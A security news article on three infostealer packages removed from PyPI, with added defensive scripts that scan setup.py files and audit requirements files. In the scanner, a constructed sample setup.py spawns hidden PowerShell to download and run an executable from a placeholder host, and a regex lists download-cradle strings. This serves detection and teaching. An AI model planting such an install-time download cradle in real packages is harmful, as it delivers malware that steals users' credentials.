Programmers: look out for these infostealers on the Python Package Index


Three malicious packages carrying infostealers were recently discovered on, and subsequently removed from, the PyPI repository.

Researchers from Fortinet found three packages, uploaded between January 7 and 12 by a user named "Lollip0p". The three are called "colorslib", "httpslib" and "libhttps", and if you have installed any of them, remove them immediately. Because the payload runs at install time (see below), uninstalling the package does not undo what the dropped executable may already have done, so treat the machine and any credentials stored on it as potentially compromised.

Usually, cybercriminals looking to compromise Python developer endpoints via PyPI try typosquatting: giving their malicious packages names almost identical to those of legitimate projects. That way, developers who are careless or in a hurry may unknowingly install the malicious package instead of the genuine one.

Stealing browser data

This campaign, however, is different: the three packages use names of their own rather than imitating existing projects. To build trust, the attacker wrote complete, plausible descriptions for each package. While the total download count for the three barely passed 500, the researchers note that even that could prove devastating if one of the packages ended up as a dependency deeper in a larger software supply chain.

In all three cases the malicious logic sits in the package's "setup.py", the script pip runs automatically when it installs a source distribution. When executed, it launches a PowerShell command that tries to download an executable named "Oxyz.exe" from the internet. According to the researchers, this executable is malicious and steals browser information. The report does not say exactly which data the malware targets, but infostealers usually go for saved passwords, credit card data, cryptocurrency wallets and other valuable information.
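The practical lesson from the mechanism above is that a source distribution can be inspected statically before anything is installed. The following script is an added example written for this article, not Fortinet's tooling: it parses a setup.py with Python's ast module and flags command execution, dynamic code execution and strings typical of a PowerShell download cradle, and it can do the same for every setup.py inside an sdist tarball without running it. The two embedded setup.py samples, the "examplelib" name and the example.invalid URL are constructed for illustration and do not reproduce the real packages. One caveat when obtaining the tarball: `pip download` of an sdist may itself build metadata, which can execute setup.py, so fetch the .tar.gz file directly from the project's file listing instead.

```python
"""Static check of a source distribution's setup.py for install-time execution.

Added example for this article; it is not Fortinet's tooling and the sample
setup.py sources below are constructed to mimic the described pattern
(PowerShell fetching an executable), with placeholder names and URLs.
"""
import ast
import io
import re
import tarfile
from typing import List, Optional, Tuple

# Calls that run arbitrary commands; a legitimate setup.py almost never needs them.
EXEC_CALLS = {
    ("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "call"),
    ("subprocess", "check_call"), ("subprocess", "check_output"),
    ("os", "system"), ("os", "popen"), ("os", "startfile"),
}
# Fragments typical of a PowerShell download cradle or a dropped executable.
CRADLE_STRINGS = re.compile(
    r"powershell|Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|"
    r"Start-Process|\.exe\b", re.IGNORECASE)


def _dotted(node: ast.AST) -> Optional[Tuple[str, str]]:
    """Return ('subprocess', 'Popen') for an attribute call like subprocess.Popen."""
    if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
        return (node.value.id, node.attr)
    return None


def scan_setup_py(source: str) -> List[str]:
    """Return findings for one setup.py; an empty list means nothing suspicious."""
    findings: List[str] = []
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        # A setup.py that does not parse is itself a signal (obfuscation, non-Python payload).
        return [f"setup.py does not parse: {exc}"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in EXEC_CALLS:
                findings.append(f"line {node.lineno}: command execution via {name[0]}.{name[1]}")
            elif isinstance(node.func, ast.Name) and node.func.id in {"exec", "eval", "__import__"}:
                findings.append(f"line {node.lineno}: dynamic code execution via {node.func.id}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            hit = CRADLE_STRINGS.search(node.value)
            if hit:
                findings.append(f"line {node.lineno}: download-cradle string {hit.group(0)!r}")
    return findings


def scan_sdist(tarball: bytes) -> List[str]:
    """Scan every setup.py inside an sdist tarball (given as bytes) without executing it."""
    findings: List[str] = []
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.split("/")[-1] == "setup.py":
                src = tar.extractfile(member).read().decode("utf-8", "replace")
                findings += [f"{member.name}: {f}" for f in scan_setup_py(src)]
    return findings


def build_sdist(setup_source: str, name: str = "examplelib-1.0") -> bytes:
    """Build an in-memory sdist-like tarball so the scanner can be exercised offline."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = setup_source.encode()
        info = tarfile.TarInfo(name=f"{name}/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample: spawns a hidden PowerShell to fetch and run a remote .exe.
MALICIOUS_SETUP = '''
from setuptools import setup
import subprocess
subprocess.Popen(["powershell", "-w", "hidden", "-c",
    "Invoke-WebRequest http://example.invalid/payload.exe -OutFile p.exe; Start-Process p.exe"])
setup(name="examplelib", version="1.0", packages=[])
'''

# Constructed sample: an ordinary, purely declarative setup.py.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="examplelib", version="1.0", packages=find_packages(),
      url="https://github.com/example/examplelib")
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, scan_sdist(build_sdist(src)) or ["clean"])
```

The scanner is deliberately conservative: it only flags command execution, exec/eval, and cradle-like strings, so an ordinary setup.py with a project URL produces no findings, while the constructed malicious sample yields three (the Popen call plus the "powershell" and "Invoke-WebRequest" strings). It will not see through heavy obfuscation, but a setup.py that fails to parse or decodes and executes data at install time is already reason enough not to install the package.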

The report also found that antivirus detection of the dropped executable is low (at most 13.5% of the engines tested flagged it), meaning the attackers can successfully siphon data even from endpoints protected by antivirus solutions.

While the malicious packages have already been removed from PyPI, nothing stops the attackers from simply uploading them again under a different name and from a different account. The best protection against this type of supply chain attack is therefore to be particularly careful when pulling code building blocks from public repositories: check who published a package and how long the project has existed, inspect its setup.py before installing a source distribution, keep dependencies pinned to exact versions with hashes so a later republished package cannot slip in unnoticed, and review every new name before it is added to a project.
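Part of that review can be automated. The script below is an added example for this article, not tooling from Fortinet or PyPI: it audits a requirements file against a constructed list of approved packages, flags entries that are not version-pinned or carry no `--hash=` value, and compares each name against the approved list with a difflib similarity ratio to catch the typosquatting described earlier. The approved list and the sample requirements text are constructed, and the hash value in it is a placeholder. The name-similarity check is also a good illustration of the article's point: a transposition such as "reqeusts" is caught, whereas a freestanding name like "colorslib" is not, which is exactly why the allowlist and hash pinning are needed as well.

```python
"""Audit a requirements file for typosquat-like names and missing hash pins.

Added example for this article, not tooling from Fortinet or PyPI. The
approved-package list and the requirements text are constructed samples.
"""
import difflib
import re
from typing import List, Optional, Set, Tuple

# Constructed allowlist; in practice, your organisation's approved dependencies.
KNOWN_PACKAGES: Set[str] = {"requests", "urllib3", "colorama", "numpy", "pillow", "cryptography"}

_NAME = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)")


def normalize(name: str) -> str:
    """PEP 503 normalisation: lower-case and collapse runs of '-', '_' and '.'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def lookalike(name: str, known: Set[str], cutoff: float = 0.85) -> Optional[str]:
    """Return the approved name that `name` closely resembles, or None.

    Exact (normalised) matches are not lookalikes. The cutoff is a difflib
    similarity ratio; 0.85 catches transpositions such as 'reqeusts' while
    leaving genuinely different names such as 'colorslib' alone.
    """
    n = normalize(name)
    if n in known:
        return None
    close = difflib.get_close_matches(n, sorted(known), n=1, cutoff=cutoff)
    return close[0] if close else None


def audit_requirements(text: str, known: Set[str] = KNOWN_PACKAGES) -> List[Tuple[str, str]]:
    """Return (package, issue) pairs for every requirement that needs a look."""
    issues: List[Tuple[str, str]] = []
    # Hash-pinned requirements usually span several lines joined by backslashes.
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "-")):
            continue  # comments and pip options such as -r or --index-url
        m = _NAME.match(line)
        if not m:
            continue
        name = m.group(1)
        if "==" not in line:
            issues.append((name, "version not pinned with =="))
        if "--hash=sha256:" not in line:
            issues.append((name, "no --hash pin; pip will install whatever the index serves"))
        twin = lookalike(name, known)
        if twin:
            issues.append((name, f"name resembles approved package '{twin}' (possible typosquat)"))
        elif normalize(name) not in known:
            issues.append((name, "not on the approved list; review the project before adding it"))
    return issues


# Constructed sample requirements.txt; the hash value is a placeholder.
SAMPLE_REQUIREMENTS = """\
requests==2.31.0 \\
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
reqeusts==1.0
colorslib==1.0
Pillow>=10.0
"""

if __name__ == "__main__":
    for pkg, issue in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"{pkg}: {issue}")
```

Once a requirements file carries a hash for any entry, pip switches to hash-checking mode and refuses to install anything without one, so the "no --hash pin" findings are worth fixing across the whole file at once. The approved list here is tiny; in a real setup it would be the dependencies your team has actually reviewed, which is also what turns "not on the approved list" into a meaningful gate.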

Via: BleepingComputer


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
